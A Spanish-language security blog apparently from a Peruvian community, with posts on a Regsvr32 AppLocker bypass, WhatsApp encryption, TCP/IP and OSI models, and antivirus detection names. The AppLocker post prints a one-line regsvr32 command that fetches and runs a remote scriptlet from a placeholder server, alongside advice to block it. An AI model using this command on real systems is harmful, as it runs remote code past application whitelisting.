Comunidad PeruCrack 2015!

Comunidad Informatica PeruCrack! de Informaticos para Informaticos!

Ethical Hacking

Visita la seccion de noticias, guias, videos, y mucho mas relacionado al mundo de la inSeguridad Informatica

Ingresa a las redes sociales de la comunidad

Visita nuestro Facebook oficial, siguenos en twitter y suscribete al canal de Youtube!

Networking

Los mejores tutoriales e informacion sobre redes informaticas. Preparate para tus examenes de certificacion.

Podcast PeruCrack

Escucha las grabaciones de los mejores Podcast de la comunidad.

martes, 3 de mayo de 2016

Saltarse la protección de AppLocker de Windows con Regsvr32

Un investigador en seguridad de Colorado (Estados Unidos) llamado Casey Smith ha descubierto una característica en Regsvr32, la herramienta en línea de comando para registrar y quitar DLL y controles de ActiveX en el registro de Windows, que permite saltarse la seguridad de AppLocker, siendo esto último la característica que permite bloquear o poner en una lista blanca las aplicaciones y programas que pueden ejecutarse en el sistema.




Para saltarse la protección de AppLocker, Casey Smith ejecutó una línea de comando con Regsvr32 que apuntaba a un fichero alojado en un servidor remoto, aunque más tarde el propio investigador descubriría que también funciona con ficheros almacenados localmente. Lo peor de todo es que no se requiere de acceso como administrador para realizar este tipo de acciones, por lo que los usuarios de todo tipo están expuestos a este fallo de seguridad. Por otro lado el exploit no realiza ningún cambio en el registro del sistema.por lo que no dejara huella


regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
Regsvr32 es capaz de detectar la presencia proxies, utiliza TLS, sigue redirecciones e incluso es capaz de ejecutar binarios de Windows pudiéndose saltar la protección de AppLocker debido a que Regsvr32 está en su lista blanca, ya que es una función esencial del sistema.

Sin duda se trata de una vulnerabilidad bastante grave que requiere de la aplicación de un parche que sea publicado lo antes posible. Como medida de precaución se recomienda bloquear Regsvr32 y Regsvr64 con el firewall de Windows para evitar la ejecución de código y binarios en remoto a través de esas herramientas.

lunes, 11 de abril de 2016

Whatsapp agrega cifrado a las conversaciones ¿Es posible espiar los mensajes?

Si usas la versión más reciente de WhatsApp, puedes estar tranquilo de que tu comunicación está segura y que ningún par de ojos curiosos la podrá ver... o si?





El cifrado usado es conocido como End-to-End, este cifrado extremo a extremo ha comenzado a activarse a todos los usuarios. Cuando nos registramos en WhatsApp se intercambian una serie de claves con los servidores, de manera que quedamos autenticados ante él. Utilizando dichas claves, cada vez que iniciamos un chat, una llamada o cualquier otra comunicación, se genera una clave única por cada elemento de manera que todo el tráfico queda cifrado extremo a extremo y permanece cifrado incluso en los propios servidores de WhatsApp, impidiendo que estas puedan ser descifradas.





Para llevar a cabo este cifrado se utilizan los siguientes elementos:

Claves públicas

  • Identity Key Pair: Una clave de larga duración Curve25519, generada en el momento de la instalación.
  • Signed Pre Key: Una clave de duración media Curve25519, generada durante la instalación, firmada por la Identity Key Pair y que cambia con el tiempo.
  • One-Time Pre Keys: Una lista de claves Curve25519 de un solo uso, generadas durante la instalación y reemplazadas según sea necesario.


Claves de sesión 

  • Root Key: Una clave de 32-bytes utilizada para crear las Chain Keys.
  • Chain Key: Una clave de 32-bytes usada para crear las Message Keys.
  • Message Key: Una clave de 80-bytes usada para cifrar todo el tráfico de las comunicaciones


Nuestra informacion ahora es confidencial ?

Si y No, Whatsapp ya ha confesado que hay ciertas cosas que continúan observando, por ejemplo los números de teléfono origen-destino continuaran almacenados en los servidores de whatsapp de manera liro, asi mismo la hora y fecha de envío de mensajes continuará siendo de conocimiento de la corporación. 






Es posible espiar los mensajes? 

Un hacker puede recurrir a técnicas habituales como infectar el dispositivo con un troyano y lograr ver tus mensajes. Whatsapp no puede hacer nada contra esto, pero sí contra el pirateo directo por wifi o conexiones 3G o 4G, osea no podrá sniffear la red :)

sábado, 14 de noviembre de 2015

Explicando el modelo TCP/IP y analizandolo con Wireshark

El modelo TCP/IP describe un conjunto de guías generales de diseño e implementación de protocolos de red específicos para permitir que un equipo pueda comunicarse en una red. TCP/IP provee conectividad de extremo a extremo especificando como los datos deberían ser formateados, direccionados, transmitidos, enrutados y recibidos por el destinatario. 






Aquí te lo explico en vídeo :)











Pueden ver el video en este enlace :


https://www.youtube.com/watch?v=iLLkw4kFzO8

viernes, 13 de noviembre de 2015

¿Qué es el modelo OSI?

El modelo de referencia OSI -Open System Interconnection- es la forma en que la ISO -International Standards Organization- ve las etapas en que se desarrolla un proceso de comunicaciones en redes de datos. El modelo resulta algo tedioso pero en este video te lo explico :)









Acá les dejo el vídeo :

https://www.youtube.com/watch?v=jQHHDUgKvPk


viernes, 30 de octubre de 2015

Interpretando los resultados de una deteccion de Virus en tu PC

Muchas veces a la hora de correr un análisis de virus en búsqueda de amenazas dentro de nuestra PC nos topamos desagradablemente con resultados que a veces ni los entendemos y se nos da tan solo por dar click en "Eliminar Amenazas". Sin embargo, soy de los que les gusta saber mas e investigar que es lo que este "Virus" ha estado haciendo a mi PC y también por que razón entro. En esta publicación analizaremos el primer punto. 



Analizando la estructura : 

Esta información es útil para interpretar los resultados arrojados por los diferentes Antivirus e incluyendo el de VirusTotal. Al conocer los nombres de detección se puede obtener información sobre las muestras y estimar la probabilidad de falsos positivos.




Vamos a concentrarnos en un orden, el cual es usado por la mayoría de los AV, basado en ciertos patrones repetitivos :


Plataforma, Tipo, Nombre y Variante

Voy a tomar como ejemplo el resultado arrojado por ESET NOD 32 al momento de detectar una amenaza :
Win32/Spy.Zbot.ABW
Como pueden ver aquí cada uno de los componentes esta separado por una razón y eso es justo lo que quiero explicar en este post :)


Plataforma : 

Esto puede especificar el sistema operativo y la arquitectura que el malware se ejecuta, por ejemplo, Unix , Win32 , Win64. Pero también puede especificar el lenguaje de programación en  que el archivo fue escrito. A veces se utilizan plataformas de paraguas , por ejemplo, la plataforma puede ser " genérico " (sin plataforma especificada ) Aqui les pongo algunos ejemplos :


  • PHP
  • Java
  • Powershell
  • Win64
  • Win32
  • MSIL
  • Generic
  • Script

Tipo : 

Este elemento especifica el tipo de virus al que hemos sido expuestos, es bastante comun que usen este tipo de nombres :

  • Trojan
  • Downloader
  • Dropper
  • Spy
  • Virus
  • Worm
  • Application
  • Adware
  • PUP
  • PUA
Puedo hacer un paréntesis a los últimos 4 ejemplos para indicar que a veces se presenta este tipo de de archivos indeseados que en realidad son nombres generales y que por alguna razon han parado en la lista negra de los motores de antivirus mas conocidos. 


Nombre : 

El nombre de malware suele ser el nombre de la familia a la que pertenece . Pero hay un montón de ocasiones en donde usan nombres mas genéricos los cuales son matcheados con una base de datos respectiva. 

Variante : 

El Malware a menudo evoluciona con el tiempo . Ya sea porque el autor agrega mas funcionalidades o  cuando cambia partes de su código para evadir la detección. Estas versiones modificadas se convierten en variantes del malware originales . Todas las variantes de un malware pertenecen a una familia de malware , que se indica con el nombre de malware.

Informacion Adicional : 

A veces puede traer información adicional que nos permita conocer un poco mas sobre el dichoso Malware. Por ejemplo pueden mostrar un sufijo o prefijo que denota si un archivo se detectó genérica o heurísticamente. Estos términos dicen algo acerca de cómo se hizo la decisión para detectar el archivo


Nombres genéricos : 


Los nombres por defecto son diferentes para cada proveedor y son creados por lo general para las entradas añadidas de forma automática; a veces pueden ser añadidos por los analistas de malware si no quieren pensar en un nombre propio. 

Nombres predeterminados típicos son Agent o Generic y en su mayoria son colocadas en Trojanos : 

Trojan.Generic.KD.87847
Trojan.Win32.Generic!BT
Trojan ( 00071a9a1 )
Artemis!5EAC6EABC66A
Win.Trojan.Agent-691724
Gen:Variant.Zusy.53898
UnclassifiedMalware

Detección basada en análisis genérico y en heuristica : 


Las detecciones basadas en un analisis generico por su mayoria trabajan en base a una revision superficial sobre los nomre y tipo de familias de malware encontradas en una PC, en su mayoria arroja resultados denominados falsos-positivos. 




La heuristica basa su control en relación al comportamiento malicioso de algún proceso o archivo y hace un estudio enfocado a tal problema, esto es lo que hace que un AV sea inteligente o no, tambien es importante indicar que a veces el abuso de esta clase de "inteligencia" hace que una PC pueda correr "lento" ya que para hacer seguimiento a tal fin hace falta el consumo de recursos extra. 

Aqui un ejemplo de un resultado de virus encontrado mediante Heuristica
BehavesLike.Win32.Dropper.cc
Gen:Backdoor.Heur.FU
Win32.Trojan-Ransom.CryptoWall.D@gen
Gen:Win32.Necurs
Gen:Variant.Dyzap.13 

Saludos!